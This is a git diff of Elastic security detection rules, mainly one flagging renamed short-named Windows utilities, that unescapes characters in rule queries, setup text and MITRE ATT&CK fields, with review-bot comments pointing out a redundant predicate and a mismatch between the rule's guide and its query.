diff --git a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_104.json b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_104.json
index cbeb9507623..6b7e1e5f88e 100644
--- a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_104.json
@@ -15,7 +15,7 @@
 "license": "Elastic License v2",
 "name": "Suspicious Execution - Short Program Name",
 "note": "",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) \u003e 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) \u003e 5\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) > 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) > 5\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
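Review bot: The added `query` line in the `@@ -15,7 +15,7 @@` hunk keeps `length(process.name) > 0 and` in front of `length(process.name) == 5`, and the first predicate is implied by the second, so the condition can be shortened to `length(process.name) == 5 and length(process.pe.original_file_name) > 5`. The same query text is added in the `_105`, `_106` and `_107` files of this rule, so the simplification applies there as well. It is also worth a word in `setup` or `note` that the `> 5` comparison on `process.pe.original_file_name` presumably only evaluates for events that carry PE version metadata, so processes without that field never match; that looks intended but is undocumented. If these JSON files are exported from an upstream rule source, the change belongs there rather than in this package.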
diff --git a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_105.json b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_105.json
index 5da230f1d13..6ba4b5597b2 100644
--- a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_105.json
@@ -15,7 +15,7 @@
 "license": "Elastic License v2",
 "name": "Suspicious Execution - Short Program Name",
 "note": "",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) \u003e 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) \u003e 5\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) > 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) > 5\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_106.json b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_106.json
index 6f420254849..227d29c2409 100644
--- a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_106.json
@@ -14,8 +14,8 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Renamed Utility Executed with Short Program Name",
- "note": "## Triage and analysis\n\n### Investigating Renamed Utility Executed with Short Program Name\n\nIdentifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry 
events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) \u003e 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) \u003e 5\n",
+ "note": "## Triage and analysis\n\n### Investigating Renamed Utility Executed with Short Program Name\n\nIdentifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == 
null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) > 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) > 5\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_107.json b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_107.json
index 128b7f103b8..b6ba7fd8be5 100644
--- a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_107.json
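Review bot: The new `note` text in the `@@ -14,8 +14,8 @@` hunk of the `_106` file describes the rule as matching "a single character process name, differing from the original file name", but the `query` line beside it matches any `process.name` of exactly five characters (`a.exe`, but equally `abcde`) and never compares the two names; it only requires `process.pe.original_file_name` to be longer than five characters. An analyst reading the guide would expect a name comparison that is not there, so the opening sentence of the note should state the actual condition, e.g. `Identifies the execution of a process whose name is exactly five characters long (typically a single character plus the .exe extension) while its PE original file name is longer than five characters, which is common for renamed utilities.` The same note/query pair is added in the `_107` file of this rule, where the same wording fix applies.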
@@ -14,8 +14,8 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Renamed Utility Executed with Short Program Name",
- "note": "## Triage and analysis\n\n### Investigating Renamed Utility Executed with Short Program Name\n\nIdentifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry 
events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) \u003e 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) \u003e 5\n",
+ "note": "## Triage and analysis\n\n### Investigating Renamed Utility Executed with Short Program Name\n\nIdentifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == 
null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) > 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) > 5\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_103.json b/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_103.json
index b4df338e607..fb52b179ec1 100644
--- a/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_103.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_104.json b/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_104.json
index 9ffceae3b47..3638325a41f 100644
--- a/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/184dfe52-2999-42d9-b9d1-d1ca54495a61_104.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_1.json b/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_1.json
index 7ad95fc3381..3973f3b546e 100644
--- a/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_1.json b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_1.json
index f7c39723bae..82ad5341163 100644
--- a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_1.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_2.json b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_2.json
index 86932870855..ad23e7bc74f 100644
--- a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_2.json
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_3.json b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_3.json
index c436e5d9686..929963057a4 100644
--- a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_3.json
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_1.json b/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_1.json
index bf4439c7ee0..03f922ddb0b 100644
--- a/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_1.json b/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_1.json
index 6b18b2f3ccd..ed7a5ffa7d3 100644
--- a/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_1.json
@@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_2.json b/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_2.json index dd9d65a5712..eb94c67dc7c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_2.json +++ b/packages/security_detection_engine/kibana/security_rule/1a289854-5b78-49fe-9440-8a8096b1ab50_2.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0043", "name": "Reconnaissance", diff --git a/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_101.json b/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_101.json index d1cc7fedbaf..a12b164a278 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_101.json +++ b/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_101.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_102.json b/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_102.json index 96547b84821..5968471f6df 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_104.json b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_104.json index 71fd1bfceb8..11851d72dd7 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_104.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
